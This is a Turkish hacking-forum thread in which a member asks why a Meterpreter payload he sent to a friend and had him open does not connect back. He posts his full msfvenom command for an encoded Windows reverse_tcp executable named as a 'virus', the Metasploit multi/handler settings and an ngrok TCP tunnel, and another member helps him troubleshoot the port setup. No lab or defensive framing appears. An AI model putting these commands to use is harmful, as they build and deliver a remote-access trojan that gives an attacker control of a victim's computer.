Sızma Testleri Meterpreter kurban gelmiyor

Howert

Katılımcı Üye
15 Mar 2022
590
222
root@Howert
Merhaba, ben tüm komutları ngrok'u falan doğru düzgün ayarladım ama bir arkadaşıma payloadı atıp açtırdığımda bana gelmedi. Kendimde açtığımda geldi herşeyi doğru ayarladığıma eminim sebebi ne olabilir? Girdiğim komutları isteyen olursa atarım incelemesi için

Kruvazör

Ar-Ge Ekibi Lideri
28 Mar 2020
1,804
2,748
Liman
Bu sorunun sebebi olsa olsa port sebebiyle olur diye düşünmekteyim.

Komutlarınızı atabilir, ya da süreci gösteren bir görsel dizisi/video bırakabilirsiniz.

Howert

Katılımcı Üye
15 Mar 2022
590
222
root@Howert
Bu sorunun sebebi olsa olsa port sebebiyle olur diye düşünmekteyim.

Komutlarınızı atabilir, ya da süreci gösteren bir görsel dizisi/video bırakabilirsiniz.
set LHOST kali ip
set LPORT 4444
msfvenom --payload windows/meterpreter/reverse_tcp LHOST=kali ip LPORT=4444 -e x86/shikata_ga_nai -a x86 -bad- chars '\x00\xff' -f exe > /root/Masaüstü/virüsismi.exe
use multi/handler set LHOST kali ip set LPORT 4444
set PAYLOAD windows/meterpreter/reverse_tcp
run

Bu komutları kullanıyorum ./ngrok tcp 4444 yazıp portumu açtıktan sonra

Kruvazör

Ar-Ge Ekibi Lideri
28 Mar 2020
1,804
2,748
Liman

Bu konu yardımcı olabilir diye düşünüyorum bakabilir misiniz?

Fikrim hala sabit port kısmında bir sorun var sanırım.

Howert

Katılımcı Üye
15 Mar 2022
590
222
root@Howert

Bu konu yardımcı olabilir diye düşünüyorum bakabilir misiniz?

Fikrim hala sabit port kısmında bir sorun var sanırım.
use multihandler
set LHOST 0.0.0.0
set LPORT 145(port açarken ne girdiyseniz onu yazın)
o bu komutları ayrı ayrı girmiş fakat ben birleştirmiştim ondan olabilir + portlar farklı ama ondan olduğunu sanmıyorum + payload oluşturma komutu farklı belki ondandır

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.